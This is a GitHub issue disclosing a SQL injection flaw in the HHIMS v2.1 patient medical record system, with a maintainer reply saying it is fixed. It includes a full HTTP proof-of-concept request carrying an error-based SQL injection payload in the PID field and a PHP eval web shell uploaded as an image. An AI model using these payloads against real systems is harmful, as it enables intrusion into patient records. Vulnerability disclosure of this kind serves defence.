Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL injection vulnerability exists in HHIMS V2.1 of patient medical record system #1

Closed
huclilu opened this issue Nov 10, 2022 · 2 comments

Comments

@huclilu
Copy link

huclilu commented Nov 10, 2022

1.SQL injection vulnerability exists in HHIMS V2.1 of patient medical record system

System version: 2.1

Vulnerability URL:http://hhims.test/index.php/attach/portrait/1

Build environment: Apache 2.4.39; MySQL5.0.96; PHP5.6.9

Vulnerability description:

HHIMS is a free and open-source software system used to store and retrieve a simple patient medical record. The system was programmed by Lunar Technologies for the ICTA (Information and Communication Technology Agency of the Sri Lankan Government).
Each patient has a corresponding PID parameter,

In the function of uploading patient portrait, PID is a controllable variable, and PID parameters can be brought into the database for query, thus causing SQL injection vulnerabilities.

The paths are application/modules/attach/controllers/attach.php and application/models/persistent. php

Code audit:

  • In the attach controller, lines 51-99, save_ The portlet function is used to upload and save pictures. The parameters sent by the front-end through POST include x, y, w, h and variable PID

  • At the code line 58, the function in the contemporary controller is called. In the contemporary controller, variables are brought into the database for query without filtering

SQL injection vulnerability points are shown in the figure below

2.We can use sqlmap to validate

  • Boolean blind note

  • Error injection

3.Manual SQL injection proof

  • Manual verification

  • Burpsuite verification

4.SQL injection POC

POST /index.php/attach/save_portrait HTTP/1.1
Host: hhims.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 1098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Cookie: PHPSESSID=ha23p18u46aqdcofn4hr2ae783; ci_session=a%3A18%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%226d0686706e577604e98e7b88dbf0ce0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A111%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F107.0.0.0+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1668046818%3Bs%3A3%3A%22UID%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22last_prescription_cmd%22%3Bs%3A7%3A%22by_name%22%3Bs%3A5%3A%22Title%22%3Bs%3A3%3A%22Mr.%22%3Bs%3A9%3A%22FirstName%22%3Bs%3A16%3A%22Thurairajasingam%22%3Bs%3A4%3A%22Post%22%3Bs%3A14%3A%22Lab+Technician%22%3Bs%3A8%3A%22UserName%22%3Bs%3A4%3A%22demo%22%3Bs%3A8%3A%22FullName%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A9%3A%22UserGroup%22%3Bs%3A10%3A%22Programmer%22%3Bs%3A8%3A%22Hospital%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A15%3A%22DefaultLanguage%22%3Bs%3A7%3A%22English%22%3Bs%3A13%3A%22hospital_info%22%3Ba%3A31%3A%7Bs%3A3%3A%22HID%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Name%22%3Bs%3A15%3A%22Kalutara+Server%22%3Bs%3A10%3A%22Telephone1%22%3Bs%3A7%3A%221234566%22%3Bs%3A10%3A%22Telephone2%22%3Bs%3A0%3A%22%22%3Bs%3A14%3A%22Address_Street%22%3Bs%3A14%3A%22No+2+Lake+Road%22%3Bs%3A15%3A%22Address_Village%22%3Bs%3A13%3A%22Gamagoda+West%22%3Bs%3A18%3A%22Address_DSDivision%22%3Bs%3A9%3A%22Dodangoda%22%3Bs%3A16%3A%22Address_District%22%3Bs%3A8%3A%22Kalutara%22%3Bs%3A15%3A%22Address_Country%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22Address_ZIP%22%3Bs%3A1%3A%220%22%3Bs%3A10%3A%22CreateDate%22%3Bs%3A19%3A%220000-00-00+00%3A00%3A00%22%3Bs%3A10%3A%22CreateUser%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22LastUpDate%22%3Bs%3A19%3A%222015-08-13+20%3A32%3A57%22%3Bs%3A14%3A%22LastUpDateUser%22%3Bs%3A33%3A%22Mr.+Thurairajasingam+SENTHILRUBAN%22%3Bs%3A6%3A%22Active%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22Code%22%3Bs%3A4%3A%220001%22%3Bs%3A4%3A%22Type%22%3Bs%3A3%3A%22PBH%22%3Bs%3A11%3A%22Current_BHT%22%3Bs%3A8%3A%222015%2F2%2F2%22%3Bs%3A18%3A%22Display_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A23%3A%22Display_Zero_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A19%3A%22Dispense_Drug_Count%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Display_Previous_Drug%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Use_One_Field_Name%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22Use_Calendar_DOB%22%3Bs%3A1%3A%221%22%3Bs%3A18%3A%22Instant_Validation%22%3Bs%3A1%3A%221%22%3Bs%3A21%3A%22Number_NIC_Validation%22%3Bs%3A1%3A%220%22%3Bs%3A8%3A%22LIC_Info%22%3Bs%3A149%3A%22HOSPITAL+NAME%3DKalutara+ServernHOSPITAL+Key%3Dca9792275c984972591f9d949cd7a4c85e04facfnBARCODE%3DYesnAPPOINTMENTSYSTEM%3DYesnAUTOANALIZER%3DYesnATTACHFILE%3DYes%22%3Bs%3A15%3A%22Visit_ICD_Field%22%3Bs%3A1%3A%220%22%3Bs%3A16%3A%22occupation_field%22%3Bs%3A1%3A%220%22%3Bs%3A18%3A%22Visit_SNOMED_Field%22%3Bs%3A1%3A%220%22%3Bs%3A17%3A%22Token_Footer_Text%22%3Bs%3A44%3A%22Appointment+system+programmed+by+Lunar+Tech.%22%3B%7Ds%3A10%3A%22reset_suer%22%3Bs%3A1%3A%223%22%3Bs%3A3%3A%22mid%22%3Bs%3A1%3A%224%22%3B%7D105940c11bc7b0aeafafcc429005fe67
Origin: http://hhims.test
Referer: http://hhims.test/index.php/attach/portrait/1
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="w"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="h"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="PID"
Content-Type: form-data

1" AND ROW(1,2)>(SELECT COUNT(*),CONCAT((SELECT USER()),FLOOR(RAND(0)*2))x FROM (SELECT 6927 UNION SELECT 9908 UNION SELECT 1 UNION SELECT 2)a GROUP BY x) AND "ace"="ace
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="image"; filename="ace.jpg"
Content-Type: form-data

<?php eval(@$_POST['ace']);?>
--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="x"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75
Content-Disposition: form-data; name="y"
Content-Type: form-data


--070ee21ecab6d192870d6a7732a9ebbdfb7d406e2ea2c406bce162631f75--
@tsruban
Copy link
Owner

tsruban commented Nov 10, 2022

Thanks. we have fixed these issue.

@huclilu
Copy link
Author

huclilu commented Nov 10, 2022

You're welcome

@huclilu huclilu closed this as completed Nov 10, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants